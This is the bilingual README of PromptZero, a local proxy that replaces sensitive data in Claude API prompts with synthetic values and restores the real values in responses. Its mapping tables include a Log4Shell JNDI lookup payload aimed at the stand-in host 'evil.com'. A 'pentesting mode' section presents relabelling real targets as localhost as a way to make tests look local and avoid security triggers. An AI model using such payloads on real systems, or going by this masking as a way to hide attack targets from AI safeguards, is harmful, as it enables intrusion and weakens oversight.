Versión en Español

██████╗ ██████╗  ██████╗ ███╗   ███╗██████╗ ████████╗    ███████╗███████╗██████╗  ██████╗
██╔══██╗██╔══██╗██╔═══██╗████╗ ████║██╔══██╗╚══██╔══╝    ╚══███╔╝██╔════╝██╔══██╗██╔═══██╗
██████╔╝██████╔╝██║   ██║██╔████╔██║██████╔╝   ██║          ███╔╝ █████╗  ██████╔╝██║   ██║
██╔═══╝ ██╔══██╗██║   ██║██║╚██╔╝██║██╔═══╝    ██║         ███╔╝  ██╔══╝  ██╔══██╗██║   ██║
██║     ██║  ██║╚██████╔╝██║ ╚═╝ ██║██║        ██║        ███████╗███████╗██║  ██║╚██████╔╝
╚═╝     ╚═╝  ╚═╝ ╚═════╝ ╚═╝     ╚═╝╚═╝        ╚═╝        ╚══════╝╚══════╝╚═╝  ╚═╝ ╚═════╝

Zero trace. Full answer. El modelo ve ficción. Vos recibís la realidad.

PromptZero is a local, transparent proxy for the Claude API that detects and replaces sensitive data in your prompts before they leave your environment — then restores real values in the response. Your infrastructure, identities, and findings stay home. Always.

The Problem

You use AI to analyze logs, write pentest reports, review code, summarize contracts. But every prompt you send contains real IPs, real hostnames, real names, real credentials.

That data goes to a third-party server. Every time.

You type:                          Claude receives:
─────────────────────────────      ─────────────────────────────
"Analyze traffic from              "Analyze traffic from
 192.168.1.45 targeting             192.168.1.45 targeting
 db.prod.company.com                db.prod.company.com     ← your real infra
 Credentials: admin:P@ss1"          Credentials: admin:P@ss1"  ← your real creds

PromptZero fixes this.

How It Works

╔══════════════════════════════════════════════════════════════════════╗
║                        YOUR ENVIRONMENT                              ║
║                                                                      ║
║  ┌─────────────┐     ┌──────────────────────────────┐               ║
║  │  Your App   │────▶│         PromptZero            │               ║
║  │  Script     │     │       localhost:8000           │               ║
║  │  Agent      │◀────│                               │               ║
║  └─────────────┘     │  ① Detect  → PII, IPs, hosts │               ║
║                       │  ② Replace → synthetic data  │               ║
║                       │  ③ Forward → clean prompt    │               ║
║                       │  ④ Receive → AI response     │               ║
║                       │  ⑤ Restore → real values     │               ║
║                       └──────────────┬───────────────┘               ║
║                                      │                               ║
║         ✗ Real data NEVER            │  Only synthetic               ║
║           crosses this line          │  data crosses here            ║
╚══════════════════════════════════════│══════════════════════════════╝
                                       │
                              ┌────────▼────────┐
                              │    Claude API    │
                              │  (sees fiction,  │
                              │  answers facts)  │
                              └─────────────────┘

Before & After

YOUR PROMPT (real data)              WHAT CLAUDE SEES (synthetic)
══════════════════════════           ════════════════════════════════
192.168.1.45              ────▶      127.0.0.1
db.prod.company.com       ────▶      localhost.localdomain.1
admin@company.com         ────▶      user001@fakecorp.local
John Smith                ────▶      Alice Harrington          (NLP)
Acme Financial S.A.       ────▶      Globex Industries         (NLP)
+54 11 4444-5555          ────▶      +1-555-000-0001
DNI 28.456.123            ────▶      FAKE-ID-000001
sk-ant-api03-xxxxx...     ────▶      FAKE_TOKEN_0001_xxxxxxxx
${jndi:ldap://evil.com/x} ────▶      ${jndi:ldap://localhost.localdomain.2/x}


CLAUDE'S RESPONSE (synthetic)        YOU RECEIVE (real data restored)
════════════════════════════         ═════════════════════════════════
"127.0.0.1 shows signs    ────▶      "192.168.1.45 shows signs
 of lateral movement to               of lateral movement to
 localhost.localdomain.1"             db.prod.company.com"

What Gets Protected

Data Type	Real → Synthetic	Detection
IPv4 address	`203.0.113.50` → `127.0.0.1`	Regex
IPv6 address	`2001:db8::1` → `::1`	Regex
Hostname / FQDN	`vpn.corp.com` → `localhost.localdomain.1`	Regex
URL	`https://api.corp.com/v2` → `https://localhost.localdomain.2/v2`	Regex
host:port	`db.internal:5432` → `localhost.localdomain.3:5432`	Regex
Email	`john@corp.com` → `user001@fakecorp.local`	Regex + NLP
Phone	`+54 11 4444-5555` → `+1-555-000-0001`	Regex + NLP
Person name	`John Smith` → `Alice Harrington`	NLP (spaCy)
Organization	`Acme Corp S.A.` → `Globex Industries`	NLP (spaCy)
National ID / DNI	`28.456.123` → `FAKE-ID-000001`	NLP (Presidio)
Passport	`AAB123456` → `XX0000001`	NLP (Presidio)
SSN	`123-45-6789` → `000-00-0001`	Regex + NLP
Credit card	`4111 1111 1111 1234` → `4111-1111-1111-0001`	Regex + NLP
IBAN	`GB29NWBK60161331926819` → `FAKEIBAN000...`	NLP
API key / Token	`sk-ant-api03-xxxxxx...` → `FAKE_TOKEN_0001_xxxxxxxx`	Regex

Pentesting mode: IPs map to 127.0.0.x and hostnames to localhost.localdomain.x — this frames your tests as local, avoids WAF/IDS triggers, and is accurate since you're running tests from a controlled environment anyway.

Architecture

promptzero/
├── main.py          ← FastAPI proxy server (drop-in for api.anthropic.com)
├── sanitizer.py     ← Detection engine: NLP (Presidio+spaCy) + Regex layers
├── setup.sh         ← One-command setup
├── requirements.txt
├── .env.example
└── examples/
    ├── document_summary/   ← Summarize PDF/DOCX/TXT with PII protection
    └── pentest_report/     ← Generate full pentest reports from findings JSON

Detection layers

Text input
    │
    ├─▶ [ NLP Layer — Presidio + spaCy ]
    │     PERSON, ORGANIZATION, PHONE, EMAIL,
    │     CREDIT_CARD, IBAN, SSN, PASSPORT,
    │     NATIONAL_ID, URL, IP_ADDRESS
    │
    ├─▶ [ Regex Layer — network & infra ]
    │     IPv4, IPv6, hostnames, host:port,
    │     long tokens/API keys, URLs
    │
    └─▶ [ Merge & deduplicate by span ]
          └─▶ Replace real → synthetic
                └─▶ Store in session mapping table

Session mapping

Each conversation gets a session-scoped bidirectional mapping table. The same real value always maps to the same synthetic value within a session — so your conversation stays coherent end-to-end.

Session: "pentest-acmecorp-2024"
─────────────────────────────────────────────────
Real value                   Synthetic value
─────────────────────────────────────────────────
192.168.1.45        ←──────▶  127.0.0.1
db.prod.acme.com    ←──────▶  localhost.localdomain.1
John Smith          ←──────▶  Alice Harrington
admin@acme.com      ←──────▶  user001@fakecorp.local
─────────────────────────────────────────────────
           Stored locally. Never sent anywhere.

Quick Start

# Clone
git clone https://github.com/openbash/promptzero
cd promptzero

# Setup (installs deps + downloads spaCy NLP model)
./setup.sh

# Configure
cp .env.example .env
# → edit .env and add your ANTHROPIC_API_KEY

# Run
python main.py
# Listening on http://localhost:8000

Use ./setup.sh small for a lighter spaCy model (~12 MB vs ~560 MB). The small model is faster but less accurate for person/org detection.

Usage

PromptZero is a drop-in replacement for https://api.anthropic.com. One line change. Everything else stays the same.

Python SDK

import anthropic

client = anthropic.Anthropic(
    api_key="your-api-key",
    base_url="http://localhost:8000",   # ← only change
)

message = client.messages.create(
    model="claude-opus-4-6",
    max_tokens=1024,
    messages=[{
        "role": "user",
        "content": "Analyze traffic from 10.0.1.42 to db.prod.corp:5432. User: john@corp.com"
    }],
    extra_headers={"x-session-id": "my-session"},  # keeps mapping consistent
)

print(message.content[0].text)
# → Real IPs and email are restored in the response

curl

curl http://localhost:8000/v1/messages \
  -H "x-api-key: $ANTHROPIC_API_KEY" \
  -H "x-session-id: my-session" \
  -H "anthropic-version: 2023-06-01" \
  -H "content-type: application/json" \
  -d '{
    "model": "claude-opus-4-6",
    "max_tokens": 1024,
    "messages": [{
      "role": "user",
      "content": "The payload hit 203.0.113.5:8443 — what does this CVE-2024-21762 exploit look like?"
    }]
  }'

Management endpoints

# Health check
GET  /health

# Inspect what PromptZero mapped in a session (debug)
GET  /sessions/{session_id}/mappings

# Reset a session's mapping table
DELETE /sessions/{session_id}

Examples

Document Summary

Summarize any document (PDF, DOCX, TXT, log) with full PII protection.

cd examples/document_summary
pip install -r requirements.txt

python summarize.py contract.pdf
python summarize.py incident_report.docx --mode executive --lang es
python summarize.py access.log --mode technical

Pentest Report Generator

Generate professional pentest reports from a structured findings JSON. IPs, hostnames, client names, credentials, and payloads are all protected.

cd examples/pentest_report
pip install -r requirements.txt

# Full technical report
python report.py findings.json

# Executive summary in Spanish
python report.py findings.json --mode executive --lang es --out ejecutivo.md

# Remediation checklist
python report.py findings.json --mode remediation --out fixes.md

# Protect short passwords the proxy might miss
python report.py findings.json --protect "P@ssw0rd1" "Summer2023!"

See examples/pentest_report/sample_findings.json for a complete example with 6 realistic findings (critical → low).

Why PromptZero?

                    SaaS Vendors          PromptZero
                    (Private AI,          (this project)
                     Protecto, etc.)
                   ─────────────────      ──────────────────
Data leaves env?    YES — goes to them    NO — stays local
Cost                Per-volume billing   Free / open source
Works offline       No                   Yes
Pentesting-aware    No                   Yes (127.0.0.x)
Customizable        Limited              Full source access
Auditable           No                   Yes
Paradox-free        No*                  Yes

* Sending private data to a third party so they can "protect" it
  before sending it to another third party is not privacy.

About OpenBash

PromptZero is a project by OpenBash.com — a community built from pentesters, to pentesters.

We build open-source security tools that help the community work smarter, stay protected, and keep sensitive data where it belongs: at home.

If this tool helps you, share it. If you find a bug, open an issue. If you improve it, send a PR.

Contributing

# Fork → clone → branch
git checkout -b feature/my-improvement

# Make changes, test manually
python main.py &
# test your changes against localhost:8000

# Submit PR to main

Ideas for contributions:

Additional language support (spaCy models for ES, PT, FR, DE)
Persistent session storage (SQLite / Redis)
More examples (log_analyzer, code_reviewer, nessus_parser)
CLI wrapper (promptzero "your prompt here")
Docker image

License

MIT — free to use, modify, distribute. Attribution appreciated but not required.

Versión en Español

¿Qué es PromptZero?

PromptZero es un proxy local y transparente para la API de Claude que detecta y reemplaza datos sensibles en tus prompts antes de que salgan de tu entorno — y restaura los valores reales en la respuesta. Tu infraestructura, identidades y hallazgos siempre se quedan en casa.

Slogan: Cero rastro. Respuesta real.

El Problema

Usás IA para analizar logs, escribir reportes de pentesting, revisar código, resumir contratos. Pero cada prompt que enviás contiene IPs reales, hostnames reales, nombres reales, credenciales reales.

Esos datos van a un servidor de terceros. Siempre.

PromptZero lo resuelve interceptando cada request localmente, reemplazando los datos sensibles por equivalentes sintéticos consistentes, y restaurando los valores reales en la respuesta.

Cómo Funciona

TU ENTORNO
┌─────────────────────────────────────────────────────────────┐
│                                                             │
│  Tu App/Script ──▶ PromptZero (localhost:8000)              │
│       ▲                │                                    │
│       │                ① Detectar PII, IPs, hosts           │
│       │                ② Reemplazar con datos ficticios      │
│       └────────────────③ Reenviar prompt limpio             │
│                        ④ Recibir respuesta de Claude        │
│                        ⑤ Restaurar valores reales           │
│                                                             │
│         ✗ Los datos reales NUNCA cruzan este límite         │
└───────────────────────────────────┬─────────────────────────┘
                                    │ Solo datos sintéticos
                             ┌──────▼──────┐
                             │  Claude API  │
                             │ (ve ficción, │
                             │ responde OK) │
                             └─────────────┘

Datos que protege

Tipo	Dato real	Dato sintético
IP (pentesting)	`192.168.1.45`	`127.0.0.1`
Hostname	`db.prod.empresa.com`	`localhost.localdomain.1`
Email	`juan@empresa.com`	`user001@fakecorp.local`
Nombre / Apellido	`Juan García`	`Alice Harrington`
Empresa	`Empresa XYZ S.A.`	`Globex Industries`
Teléfono	`+54 11 4444-5555`	`+1-555-000-0001`
DNI / Documento	`28.456.123`	`FAKE-ID-000001`
Tarjeta de crédito	`4111 1111 1111 1234`	`4111-1111-1111-0001`
Token / API key	`sk-ant-api03-xxx...`	`FAKE_TOKEN_0001_xxxxxxxx`
Payload con host	`${jndi:ldap://evil.com}`	`${jndi:ldap://localhost.localdomain.2}`

Modo pentesting: Las IPs se mapean a 127.0.0.x y los hostnames a localhost.localdomain.x — esto enmarca los tests como locales, evita alertas de WAF/IDS y es técnicamente correcto ya que las pruebas se realizan desde infraestructura controlada.

Inicio rápido

git clone https://github.com/openbash/promptzero
cd promptzero

./setup.sh          # instala todo + modelo NLP (~560 MB)
./setup.sh small    # modelo más liviano (~12 MB, menos preciso)

cp .env.example .env
# → agregar ANTHROPIC_API_KEY

python main.py

Solo cambiás base_url en tu SDK:

client = anthropic.Anthropic(
    api_key="tu-api-key",
    base_url="http://localhost:8000",  # ← único cambio
)

Ejemplos incluidos

# Resumir un documento con PII protegida
cd examples/document_summary
python summarize.py contrato.pdf --lang es

# Generar reporte de pentesting desde findings.json
cd examples/pentest_report
python report.py findings.json --mode executive --lang es --out reporte.md
python report.py findings.json --protect "P@ssw0rd1" "token_secreto"

Sobre OpenBash

PromptZero es un proyecto de OpenBash.com — una comunidad construida de pentesters para pentesters.

Construimos herramientas de seguridad open source para que la comunidad pueda trabajar mejor, mantenerse protegida y conservar sus datos sensibles donde corresponde: en casa.

Si esta herramienta te sirve, compartila. Si encontrás un bug, abrí un issue. Si la mejorás, mandá un PR.

Made with ♥ by the OpenBash community

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

The Problem

How It Works

Before & After

What Gets Protected

Architecture

Detection layers

Session mapping

Quick Start

Usage

Python SDK

curl

Management endpoints

Examples

Document Summary

Pentest Report Generator

Why PromptZero?

About OpenBash

Contributing

License

Versión en Español

¿Qué es PromptZero?

El Problema

Cómo Funciona

Datos que protege

Inicio rápido

Ejemplos incluidos

Sobre OpenBash

About

Uh oh!

Releases 1

Packages

Uh oh!

Contributors

Uh oh!

Languages

Name		Name	Last commit message	Last commit date
Latest commit History 6 Commits
agents		agents
examples		examples
.env.example		.env.example
.gitignore		.gitignore
README.md		README.md
main.py		main.py
requirements.txt		requirements.txt
sanitizer.py		sanitizer.py
setup.sh		setup.sh

Folders and files

Latest commit

History

Repository files navigation

The Problem

How It Works

Before & After

What Gets Protected

Architecture

Detection layers

Session mapping

Quick Start

Usage

Python SDK

curl

Management endpoints

Examples

Document Summary

Pentest Report Generator

Why PromptZero?

About OpenBash

Contributing

License

Versión en Español

¿Qué es PromptZero?

El Problema

Cómo Funciona

Datos que protege

Inicio rápido

Ejemplos incluidos

Sobre OpenBash

About

Topics

Resources

Uh oh!

Stars

Watchers

Forks

Releases 1

Packages 0

Uh oh!

Contributors

Uh oh!

Languages

Packages